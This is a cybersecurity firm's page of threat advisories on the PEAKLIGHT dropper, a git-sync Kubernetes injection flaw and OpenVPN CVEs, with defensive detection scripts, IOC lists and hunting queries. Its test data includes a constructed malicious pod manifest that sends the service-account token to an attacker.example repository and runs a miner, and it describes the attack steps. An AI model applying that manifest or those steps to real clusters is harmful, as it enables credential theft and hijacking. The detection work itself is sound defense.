Blackswan CEO, Dr. Mike Saylor, Selected to Present at MSSP Alert Live 2024

Blackswan Cybersecurity is proud to announce that our CEO, Dr. Mike Saylor, was selected to present at MSSP Alert Live 2024 — October 14-16 in Austin, TX.

This year’s event will provide insights you can put to use on the latest cybersecurity strategies, technologies and business opportunities, along with new perspectives on the following market-moving trends:

  • Artificial intelligence (AI), including how it has been and can be used for incident response and crisis communications.
  • Tackling the shortage of cybersecurity talent and professionals, and how to get the most out of your existing workforce.
  • Cybersecurity liability – how to protect your business if a breached customer sues.
  • Cybersecurity insurance – how the cyber insurance market is changing and what you need to know as you head into 2025.

Whether you are just getting started offering managed security services, or an established MSSP, MSSP Alert Live will deliver everything you need for your managed security services roadmap for 2025 and beyond.

PEAKLIGHT Dropper Exploits Windows Systems via Pirated Movie Downloads to Deliver Malware

SUMMARY

A novel dropper that launches PowerShell-based malware to infect Windows systems has been identified, which is distributed through pirated movie downloads. The dropper delivers various malware strains, including Lumma Stealer and CryptBot, via a multi-stage attack chain.

 

TECHNICAL DETAILS

Mandiant identified a multi-stage chain in which a memory-only JavaScript dropper executes PEAKLIGHT, a PowerShell-based downloader that also runs entirely in memory, to deliver payloads including Lumma Stealer, Hijack Loader, and CryptBot. The chain starts when a user fetches, via a drive-by download, a Windows shortcut (LNK) file disguised as a pirated movie.

 

The LNK file, delivered inside a ZIP archive, connects to a content delivery network (CDN) hosting the obfuscated JavaScript dropper. The dropper launches the PEAKLIGHT PowerShell script, which contacts a command-and-control (C2) server to retrieve and execute the next-stage payloads. The dropper also carries hex- and Base64-encoded PowerShell embedded in its own body, which it decodes and executes in memory.

 

Mandiant noted that this technique has appeared in several attack chains. In some of them the LNK target path uses asterisk (*) wildcards so that the legitimate mshta.exe binary is resolved and launched without its full path being spelled out, and mshta.exe then quietly runs the malicious code fetched from the remote server.

INFECTION CHAIN (diagram; source: Mandiant)

 

INDICATORS OF COMPROMISE (IOCs)

Domains:

  • relaxtionflouwerwi[.]shop
  • deprivedrinkyfaiir[.]shop
  • detailbaconroollyws[.]shop
  • messtimetabledkolvk[.]shop
  • considerrycurrentyws[.]shop
  • understanndtytonyguw[.]shop
  • patternapplauderw[.]shop
  • horsedwollfedrwos[.]shop
  • tropicalironexpressiw[.]shop

 

URLs:

  • hxxp://gceight8vt[.]top/upload.php
  • hxxps://brewdogebar[.]com/code.vue
  • hxxp://62.133.61[.]56/Downloads/Full%20Video%20HD%20(1080p).lnk
  • hxxps://fatodex.b-cdn[.]net/K1.zip
  • hxxps://fatodex.b-cdn[.]net/K2.zip
  • hxxps://forikabrof[.]click/flkhfaiouwrqkhfasdrhfsa.png
  • hxxps://matodown.b-cdn[.]net/K1.zip
  • hxxps://matodown.b-cdn[.]net/K2.zip
  • hxxps://nextomax.b-cdn[.]net/L1.zip
  • hxxps://nextomax.b-cdn[.]net/L2.zip
  • hxxps://potexo.b-cdn[.]net/K1.zip
  • hxxps://potexo.b-cdn[.]net/K2.zip
  • hxxps://fatodex.b-cdn[.]net/fatodex
  • hxxps://matodown.b-cdn[.]net/matodown
  • hxxps://potexo.b-cdn[.]net/potexo

 

MD5:

CRYPTBOT:

  • erefgojgbu (MD5: d6ea5dcdb2f88a65399f87809f43f83c)
  • zip (MD5: 307f40ebc6d8a207455c96d34759f1f3)
  • Sеexe (MD5: d8e21ac76b228ec144217d1e85df2693)

 

LUMMAC.V2:

  • oqnhustu (MD5: 43939986a671821203bf9b6ba52a51b4)
  • dll (MD5: 58c4ba9385139785e9700898cb097538)

 

PEAKLIGHT:

  • Downloader (MD5: 95361f5f264e58d6ca4538e7b436ab67)
  • Downloader (MD5: b716a1d24c05c6adee11ca7388b728d3)

 

SHADOWLADDER:

  • exe (MD5: b15bac961f62448c872e1dc6d3931016)
  • cfg (MD5: e7c43dc3ec4360374043b872f934ec9e)
  • doc (MD5: f98e0d9599d40ed032ff16de242987ca)
  • zip (MD5: b6b8164feca728db02e6b636162a2960)
  • zip (MD5: bb9641e3035ae8c0ab6117ecc82b65a1)
  • zip (MD5: 236c709bbcb92aa30b7e67705ef7f55a)
  • zip (MD5: d7aff07e7cd20a5419f2411f6330f530)
  • zip (MD5: a6c4d2072961e9a8c98712c46be588f8)
  • dll (MD5: 059d94e8944eca4056e92d60f7044f14)
  • txt (MD5: dfdc331e575dae6660d6ed3c03d214bd)
  • dll (MD5: 47eee41b822d953c47434377006e01fe)

 

RECOMMENDATIONS

  • Do not download pirated content or software from untrusted sources.
  • Keep antivirus and anti-malware solutions current and confirm they inspect PowerShell script content (exposed to them through AMSI), since PEAKLIGHT never needs to touch disk.
  • Monitor for mshta.exe or powershell.exe launched from a shortcut (parent process explorer.exe) with a remote URL or encoded command on the command line, and for unexpected ZIP or LNK downloads from CDN hosts such as those in the IOC list above.
  • Implement controls that detect and block obfuscated scripts and LNK-based execution, for example by blocking LNK files inside archives downloaded from untrusted origins.
  • Educate users about the risks of downloading files from unreliable websites, especially those offering pirated content.
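As an added example (not part of the Mandiant report or of this advisory), the script below turns the defanged network IOCs listed above into a matcher and runs it over constructed proxy log lines and constructed Sysmon-style process events, flagging both IOC hits and the mshta.exe-with-remote-URL launch pattern described above. The log format, the benign hostnames such as www.example.com, the client addresses and the event field names are assumptions made for the example; only a subset of the IOCs is embedded, so paste in the rest before using it.

```python
import re
from urllib.parse import urlparse

# Defanged network IOCs copied from the advisory above (a subset; paste in the rest).
DEFANGED_IOCS = [
    "relaxtionflouwerwi[.]shop",
    "deprivedrinkyfaiir[.]shop",
    "hxxp://gceight8vt[.]top/upload.php",
    "hxxps://fatodex.b-cdn[.]net/K1.zip",
    "hxxps://forikabrof[.]click/flkhfaiouwrqkhfasdrhfsa.png",
    "hxxp://62.133.61[.]56/Downloads/Full%20Video%20HD%20(1080p).lnk",
]

# Constructed proxy log (timestamp, client IP, method, URL, status); not real traffic.
SAMPLE_PROXY_LOG = [
    "1724000001.101 10.0.0.12 GET https://www.example.com/index.html 200",
    "1724000002.202 10.0.0.12 GET https://fatodex.b-cdn.net/K1.zip 200",
    "1724000003.303 10.0.0.17 POST http://gceight8vt.top/upload.php 200",
    "1724000004.404 10.0.0.21 GET https://cdn.relaxtionflouwerwi.shop/x 200",
]

# Constructed process-creation events using Sysmon-style field names.
SAMPLE_PROCESS_EVENTS = [
    {"Computer": "WS01", "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" https://forikabrof.click/flkhfaiouwrqkhfasdrhfsa.png'},
    {"Computer": "WS02", "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Program Files\Vendor\installer.exe",
     "CommandLine": r'mshta.exe "C:\Program Files\Vendor\setup.hta"'},
]


def refang(ioc: str) -> str:
    """Undo the hxxp / [.] defanging so the IOC can be compared with live data."""
    return re.sub(r"^hxxp", "http", ioc.replace("[.]", "."))


def build_index(iocs):
    """Split IOCs into an exact-URL set and a host set (URL IOCs contribute their host too)."""
    urls, hosts = set(), set()
    for raw in iocs:
        ioc = refang(raw).lower()
        if "://" in ioc:
            urls.add(ioc)
            hosts.add(urlparse(ioc).hostname)
        else:
            hosts.add(ioc)
    return urls, hosts


def scan_proxy_log(lines, urls, hosts):
    """Return (client, url, match_kind) for records that hit an IOC; subdomains of listed hosts count."""
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) < 5:
            continue
        client, url = parts[1], parts[3]
        host = (urlparse(url).hostname or "").lower()
        if url.lower() in urls:
            hits.append((client, url, "url"))
        elif host in hosts or any(host.endswith("." + h) for h in hosts):
            hits.append((client, url, "host"))
    return hits


# mshta.exe handed an http(s) URL: the wildcard LNK launch described above ends up looking like this.
MSHTA_REMOTE = re.compile(r"mshta(\.exe)?\b.*\bhttps?://", re.IGNORECASE)


def scan_process_events(events):
    """Return (host, parent image, command line) for mshta.exe runs that pull code from a URL."""
    hits = []
    for ev in events:
        image = ev["Image"].rsplit("\\", 1)[-1].lower()
        if image == "mshta.exe" and MSHTA_REMOTE.search(ev["CommandLine"]):
            hits.append((ev["Computer"], ev["ParentImage"], ev["CommandLine"]))
    return hits


if __name__ == "__main__":
    urls, hosts = build_index(DEFANGED_IOCS)
    for hit in scan_proxy_log(SAMPLE_PROXY_LOG, urls, hosts):
        print("proxy IOC hit:", hit)
    for hit in scan_process_events(SAMPLE_PROCESS_EVENTS):
        print("mshta remote launch:", hit)
```

The host match deliberately includes subdomains of a listed domain, because the b-cdn.net entries show the actors rotating subdomains on a shared CDN; tune that rule if your own traffic legitimately uses the same CDN.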

 

Critical Kubernetes Flaw Exposes Clusters to Command Injection Attacks

SUMMARY

A critical command-injection flaw in git-sync, a sidecar widely deployed in Kubernetes clusters, affects default installations across major platforms including Amazon EKS, Azure AKS, and Google GKE. It enables malicious command execution and data exfiltration. Despite the severity, no CVE has been assigned and no official patch has been released.

VULNERABILITY DETAILS

Akamai identified the flaw in the git-sync project, a sidecar container commonly used in Kubernetes to keep a pod’s volume in sync with a Git repository. git-sync does not sanitize the values it is given for its runtime parameters, and because anyone able to create or edit a pod spec can set those parameters, the resulting attack surface is large.

An attacker who can apply a pod manifest (YAML) to the cluster, a permission many low-privilege accounts hold, can set two parameters to hostile values. GITSYNC_GIT tells git-sync which git binary to execute; pointing it at an attacker-supplied executable makes git-sync run that binary with the container’s privileges, giving arbitrary code execution. GITSYNC_PASSWORD_FILE names the file git-sync reads the repository password from; pointing it at a secret already mounted in the pod, such as the service-account token, makes git-sync send that file’s contents as a credential to the repository URL, which the same manifest also controls, so the secret is exfiltrated to an attacker-run Git server.

The consequences are severe: unauthorized command execution, data theft, and potentially compromise of the entire Kubernetes cluster. Because the malicious binary runs inside a container that is expected to run git, attackers could deploy cryptominers or other payloads under the guise of legitimate synchronization, sidestepping controls that trust git-sync traffic. The flaw is especially concerning for organizations whose clusters pre-authorize git-sync communication, since an attacker with minimal privileges could exploit it to gain significant control.

 

RECOMMENDATIONS

  • Monitor outbound connections from pods running git-sync; a sync session to a repository host nobody approved is the exfiltration path.
  • Audit git-sync pods regularly to confirm they execute only the expected git binary with the expected parameters.
  • Add Open Policy Agent (OPA) admission rules that reject pod specs setting GITSYNC_GIT to anything but the stock git binary, or GITSYNC_PASSWORD_FILE to a path outside the intended Secret mount.
  • Restrict pod create/edit privileges (RBAC) to the smallest set of identities that need them, since the attack requires only the ability to apply a manifest.
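As an added example (not Akamai’s or the git-sync project’s code), this is the check an admission webhook or OPA policy would implement: it inspects a pod spec for git-sync sidecars and flags a GITSYNC_GIT (or --git) that points anywhere but the stock git binary, and a GITSYNC_PASSWORD_FILE (or --password-file) that points at a mounted Kubernetes secret such as the service-account token. The two manifests are constructed; the repository URLs, image tag, allowlist of git paths and denylist of secret paths are assumptions made for the example.

```python
# git-sync's own default: --git (env GITSYNC_GIT) is "git", resolved on PATH.
ALLOWED_GIT_BINARIES = {"git", "/usr/bin/git", "/usr/local/bin/git"}

# Locations a password file should never point at. Assumption: a denylist is the
# minimum; in production prefer an allowlist of the Secret mounts you expect.
FORBIDDEN_PASSWORD_PREFIXES = (
    "/var/run/secrets/kubernetes.io/",
    "/run/secrets/kubernetes.io/",
    "/proc/",
)

# Constructed manifest mirroring the attack described above: the repo URL, the
# replacement "git" binary and the password file are all attacker-chosen.
MALICIOUS_POD = {
    "apiVersion": "v1", "kind": "Pod", "metadata": {"name": "docs-sync"},
    "spec": {"containers": [
        {"name": "app", "image": "nginx:1.25"},
        {"name": "git-sync", "image": "registry.k8s.io/git-sync/git-sync:v4",  # tag assumed
         "env": [
             {"name": "GITSYNC_REPO", "value": "https://git.attacker.example/loot.git"},
             {"name": "GITSYNC_GIT", "value": "/git/bin/xmrig"},
             {"name": "GITSYNC_PASSWORD_FILE",
              "value": "/var/run/secrets/kubernetes.io/serviceaccount/token"},
         ]},
    ]},
}

# Constructed benign manifest using flag-style args and a dedicated Secret mount.
BENIGN_POD = {
    "apiVersion": "v1", "kind": "Pod", "metadata": {"name": "docs-sync"},
    "spec": {"containers": [
        {"name": "app", "image": "nginx:1.25"},
        {"name": "git-sync", "image": "registry.k8s.io/git-sync/git-sync:v4",
         "args": ["--repo=https://git.example.internal/docs.git", "--root=/git",
                  "--git=git", "--password-file=/etc/git-secret/token"]},
    ]},
}


def option_value(container, env_name, flag):
    """Effective value of a git-sync option from env (GITSYNC_*) or --flag=value / --flag value args."""
    for env in container.get("env", []):
        if env.get("name") == env_name and "value" in env:
            return env["value"]
    args = container.get("args", [])
    for i, arg in enumerate(args):
        if arg.startswith(flag + "="):
            return arg[len(flag) + 1:]
        if arg == flag and i + 1 < len(args):
            return args[i + 1]
    return None


def is_git_sync(container):
    """Recognise a git-sync sidecar by image name or by any GITSYNC_* environment variable."""
    if "git-sync" in container.get("image", ""):
        return True
    return any(e.get("name", "").startswith("GITSYNC_") for e in container.get("env", []))


def check_pod(pod):
    """Return (container name, reason) for every git-sync parameter an attacker could abuse."""
    violations = []
    spec = pod.get("spec", {})
    for c in spec.get("containers", []) + spec.get("initContainers", []):
        if not is_git_sync(c):
            continue
        git_bin = option_value(c, "GITSYNC_GIT", "--git")
        if git_bin is not None and git_bin not in ALLOWED_GIT_BINARIES:
            violations.append((c["name"], f"GITSYNC_GIT replaces the git binary with {git_bin}"))
        pw_file = option_value(c, "GITSYNC_PASSWORD_FILE", "--password-file")
        if pw_file is not None and pw_file.startswith(FORBIDDEN_PASSWORD_PREFIXES):
            violations.append((c["name"], f"GITSYNC_PASSWORD_FILE would send {pw_file} to the repo host"))
    return violations


if __name__ == "__main__":
    for name, pod in (("malicious", MALICIOUS_POD), ("benign", BENIGN_POD)):
        print(name, check_pod(pod) or "OK")
```

The same two conditions translate directly into a Rego deny rule for OPA Gatekeeper; keeping the check on the pod spec rather than on the running container is what makes it enforceable at admission time, before git-sync ever executes the attacker’s binary.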

 

OpenVPN Vulnerabilities Lead to RCE and LPE

SUMMARY

Microsoft reported four medium-severity vulnerabilities in OpenVPN that could be combined to enable remote code execution (RCE) and local privilege escalation (LPE). “Exploiting this attack chain could allow attackers to take full control of targeted endpoints, potentially leading to data breaches, system compromises, and unauthorized access to sensitive information,” stated Vladimir Tokarev from the Microsoft Threat Intelligence Community.

TECHNICAL DETAILS

Researchers discovered vulnerabilities while analyzing the OpenVPN open-source project to improve enterprise security standards. During this examination, they also reviewed two other popular VPN solutions and identified that they were vulnerable to a specific flaw (CVE-2024-1305), which led them to further investigate open-source VPN projects. Upon confirming that the same vulnerability existed in the OpenVPN repository, the research focused on evaluating the architecture and security model of OpenVPN, particularly for Windows systems.

 

List of Vulnerabilities:

  • CVE-2024-27459: A stack overflow vulnerability in Windows leading to a Denial-of-Service (DoS) and Local Privilege Escalation (LPE).
  • CVE-2024-24974: Unauthorized access to the openvpn\service named pipe (\\.\pipe\openvpn\service) in Windows, allowing remote attackers to connect to it and drive operations through it.
  • CVE-2024-27903: A flaw in the plugin mechanism causing Remote Code Execution (RCE) in Windows, and LPE and data manipulation in Android, iOS, macOS, and BSD.
  • CVE-2024-1305: A memory overflow vulnerability in the Windows Terminal Access Point (TAP) driver, leading to DoS.

 

The first three vulnerabilities are linked to a component named openvpnserv, while the fourth is related to the Windows TAP driver. These vulnerabilities can be exploited if an attacker gains access to a user’s OpenVPN credentials. Such credentials can be acquired through methods like purchasing stolen data on the dark web, deploying stealer malware, or capturing network traffic to obtain NTLMv2 hashes and cracking them using tools like HashCat or John the Ripper.

 

Attackers can chain these vulnerabilities, for example CVE-2024-24974 with CVE-2024-27903, or CVE-2024-27459 with CVE-2024-27903, to achieve RCE and LPE. Vladimir Tokarev noted that at least three of the four flaws could be leveraged to construct a potent attack chain, including techniques like Bring Your Own Vulnerable Driver (BYOVD). This could allow attackers to strip Protected Process Light (PPL) protection from critical security processes such as Microsoft Defender, bypass security products, and manipulate core system functions, making detection and mitigation more challenging.

 

Hunting Queries (Microsoft Defender advanced hunting, KQL; pipe and UNC paths are written as @"..." verbatim strings so the backslashes are not interpreted as escapes):

Detecting Remote Connections to OpenVPN’s Named Pipe:

DeviceEvents
| where ActionType == "NamedPipeEvent"
| extend JsonAdditionalFields = parse_json(AdditionalFields)
| extend PipeName = JsonAdditionalFields["PipeName"]
| where PipeName == @"\Device\NamedPipe\openvpn\service" and isnotempty(RemoteIP)

Identifying Image Load from Shared Folder into OpenVPN’s Process:

DeviceImageLoadEvents
| where InitiatingProcessFileName == "openvpn.exe" and FolderPath startswith @"\\"

Detecting Unauthorized Process Connection to OpenVPN’s Named Pipe:

DeviceEvents
| where ActionType == "NamedPipeEvent"
| extend JsonAdditionalFields = parse_json(AdditionalFields)
| extend PipeName = JsonAdditionalFields["PipeName"], NamedPipeEnd = JsonAdditionalFields["NamedPipeEnd"]
| where PipeName == @"\Device\NamedPipe\openvpn\service" and NamedPipeEnd == "Server" and InitiatingProcessFileName != "openvpnserv.exe"

 

RECOMMENDATIONS

Patch vulnerable versions:

  • Update OpenVPN to 2.5.10 or 2.6.10 (or later); all earlier 2.5.x and 2.6.x releases are affected. Obtain the patched builds from the OpenVPN website.

Security best practices:

  • Disconnect OpenVPN clients from the internet and segment them within the network.
  • Restrict access to OpenVPN clients to authorized users only.
  • Prioritize patching while ensuring proper network segmentation, enforcing strong passwords, and minimizing the number of users with write access.
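As an added example (not Microsoft’s or OpenVPN’s code), the Python below reproduces the three hunting queries above over exported advanced-hunting rows, so the logic can be tested offline or run against a SIEM export, and adds a numeric version check against the fixed releases named in the recommendations above. The sample rows are constructed; the device names, the updater.exe process, the remote address and the share path are assumptions made for the example, and the version check assumes that branches newer than 2.6 already carry the fix while 2.4 and older are end-of-life and unpatched.

```python
import json

OPENVPN_PIPE = r"\Device\NamedPipe\openvpn\service"  # as Defender records it in AdditionalFields


def openvpn_is_patched(version: str) -> bool:
    """True if an OpenVPN version is at or past the fixed releases 2.5.10 / 2.6.10.

    Compares numerically: "2.6.9" is older than "2.6.10", which a string comparison gets wrong.
    Assumption: anything newer than 2.6 carries the fix; 2.4 and older are EOL and unpatched.
    """
    parts = [int(p) for p in version.strip().split(".")[:3]]
    parts += [0] * (3 - len(parts))
    major, minor, patch = parts
    if (major, minor) in ((2, 5), (2, 6)):
        return patch >= 10
    return (major, minor) > (2, 6)


def _pipe_events(events):
    """NamedPipeEvent rows with AdditionalFields decoded, as parse_json() does in the KQL."""
    for ev in events:
        if ev.get("Table") == "DeviceEvents" and ev.get("ActionType") == "NamedPipeEvent":
            yield ev, json.loads(ev.get("AdditionalFields") or "{}")


def remote_pipe_connections(events):
    """Query 1: any connection to the openvpn service pipe that carries a RemoteIP."""
    return [ev for ev, f in _pipe_events(events)
            if f.get("PipeName") == OPENVPN_PIPE and ev.get("RemoteIP")]


def unc_image_loads(events):
    """Query 2: openvpn.exe loading an image (a plugin DLL, say) from a UNC share path."""
    return [ev for ev in events
            if ev.get("Table") == "DeviceImageLoadEvents"
            and ev.get("InitiatingProcessFileName", "").lower() == "openvpn.exe"
            and ev.get("FolderPath", "").startswith("\\\\")]


def rogue_pipe_servers(events):
    """Query 3: the server end of the pipe created by anything other than openvpnserv.exe."""
    return [ev for ev, f in _pipe_events(events)
            if f.get("PipeName") == OPENVPN_PIPE and f.get("NamedPipeEnd") == "Server"
            and ev.get("InitiatingProcessFileName", "").lower() != "openvpnserv.exe"]


def _pipe_row(device, process, remote_ip, end):
    return {"Table": "DeviceEvents", "ActionType": "NamedPipeEvent", "DeviceName": device,
            "InitiatingProcessFileName": process, "RemoteIP": remote_ip,
            "AdditionalFields": json.dumps({"PipeName": OPENVPN_PIPE, "NamedPipeEnd": end})}


# Constructed rows using Defender advanced-hunting column names; not real telemetry.
SAMPLE_EVENTS = [
    _pipe_row("vpn-client-01", "openvpn-gui.exe", "", "Client"),        # normal local GUI use
    _pipe_row("vpn-client-01", "System", "10.10.4.77", "Client"),       # pipe reached over SMB
    _pipe_row("vpn-client-02", "openvpnserv.exe", "", "Server"),        # legitimate pipe server
    _pipe_row("vpn-client-02", "updater.exe", "", "Server"),            # pipe squatted by another process
    {"Table": "DeviceImageLoadEvents", "DeviceName": "vpn-client-03",
     "InitiatingProcessFileName": "openvpn.exe",
     "FolderPath": "\\\\fileshare\\public\\plugin.dll"},                 # plugin pulled from a share
    {"Table": "DeviceImageLoadEvents", "DeviceName": "vpn-client-03",
     "InitiatingProcessFileName": "openvpn.exe",
     "FolderPath": "C:\\Program Files\\OpenVPN\\bin\\somelib.dll"},
]


if __name__ == "__main__":
    for label, finder in (("remote pipe connections", remote_pipe_connections),
                          ("UNC image loads", unc_image_loads),
                          ("rogue pipe servers", rogue_pipe_servers)):
        print(label, [(e["DeviceName"], e["InitiatingProcessFileName"]) for e in finder(SAMPLE_EVENTS)])
    for v in ("2.6.9", "2.6.10", "2.5.10", "2.4.12"):
        print(v, "patched" if openvpn_is_patched(v) else "VULNERABLE")
```

The version check matters when inventory data comes back as strings: a naive sort or string comparison ranks 2.6.9 above 2.6.10 and would report a vulnerable client as patched.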

 

The Backup Wrap-up Podcast — Ransomware Forensics

This episode of The Backup Wrap-Up dives into the critical realm of ransomware forensics with cybersecurity expert and Blackswan CEO, Dr. Mike Saylor. They examine the key procedures and tools involved in forensic analysis during a cyber attack, emphasizing the need to preserve evidence and manage the intricacies of both traditional and mobile device forensics.

Covering topics from log preservation to forensic imaging, they discuss strategies for organizations to better prepare for and respond to ransomware incidents. Dr. Saylor provides insights into the various forensic tools available, their uses, and the challenges that arise in contemporary cybersecurity investigations. Additionally, they emphasize the importance of having a forensic response plan in-place before an attack occurs.

Whether you’re an IT professional or simply interested in cybersecurity, this episode offers essential insights into the forensic processes that help decode cyber attacks and safeguard critical data. Tune in now to broaden your knowledge of ransomware forensics and bolster your organization’s cyber defense strategies.